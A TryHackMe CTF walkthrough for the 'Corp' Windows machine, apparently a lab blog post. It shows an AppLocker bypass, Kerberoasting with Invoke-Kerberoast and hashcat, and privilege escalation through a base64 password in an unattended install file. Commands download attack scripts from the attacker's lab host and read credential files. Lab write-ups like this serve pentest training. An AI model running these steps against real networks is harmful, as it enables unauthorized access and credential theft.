CTF Walkthroughs, TryHackMe

TryHackMe – Corp Walkthrough

Introduction

This was an easy Windows machine that involved exploiting a Kerberoastable service account to gain initial access and using a base64-encoded password stored in an unattended installation file to escalate privileges to Administrator.

Bypassing Applocker

Since AppLocker is configured with default rules, these can be bypassed by placing an executable in the following directory: C:\Windows\System32\spool\drivers\color as this is whitelisted by default. 

To test this, moving the “whoami.exe” binary to the current working directory and setting up a Python Simple HTTP Server to host it:

Using the Invoke-WebRequest CMDLet to download the file and saving it in the directory mentioned above:

Invoke-WebRequest -Uri http://10.9.228.20/whoami.exe -OutFile C:/Windows/System32/spool/drivers/color/whoami.exe

The request was received:

Finding the first flag by inspecting the PowerShell history:

Get-Content C:\Users\dark\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Kerberoasting

Kerberoasting is an attack that extracts service account hashes from Active Directory to be used later on for offline cracking.

Looking for users with the service principal name property set with the following command:

 setspn -T medin -Q ​ */*

This has identified a “fela” user.

Downloading the Invoke-Kerberoast.ps1 script and hosting it using a Python Simple HTTP Server:

Downloading it locally:

Invoke-WebRequest -Uri http://10.9.228.20/Invoke-Kerberoast.ps1 -OutFile Invoke-Kerberoast.ps1

The request was received:

Using Invoke-Kerberoast to dump the hash for the “fela” user:

Saving the hash to a file locally:

Running hashcat with the following flags to crack the ticket offline:

  • -a to specify the attack mode, in this case, 0 for dictionary
  • -m to specify the hash type, in this case, krbtgt
  • the file containing the hashes
  • the wordlist to use for the attack

Authenticating as the “fela” user through RDP using FreeRDP:

Viewing the second flag:

Privilege Escalation

Downloading the PowerUp privilege escalation script and hosting it using a Python Simple HTTP Server:

Downloading the script:

Invoke-WebRequest -Uri http://10.9.228.20/PowerUp.ps1 -OutFile Invoke-PowerUp.ps1

The request was received:

Running the Invoke-AllChecks function from PowerUp to start enumerating the system:

An unattended installation file was found:

These often contain encoded or plain-text credentials. Viewing the contents reveals a base64-encoded password:

Decoding the password:

$encoded = [base64-encoded password]
[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($encoded)) | Write-Output

This has revealed the clear-text password for the Administrator user. Authenticating as Administrator user through RDP using FreeRDP:

Upon authenticating, the user is greeted with the following message as the local password is expired. Hitting “OK”:

Changing the password to a new one:

Reading the last flag:

Conclusion

This was a great machine for learning the basics of Active Directory exploitation and Windows privilege escalation, it was part of TryHackMe’s Offensive Pentesting learning path and it can definitely help greatly during the OSCP journey.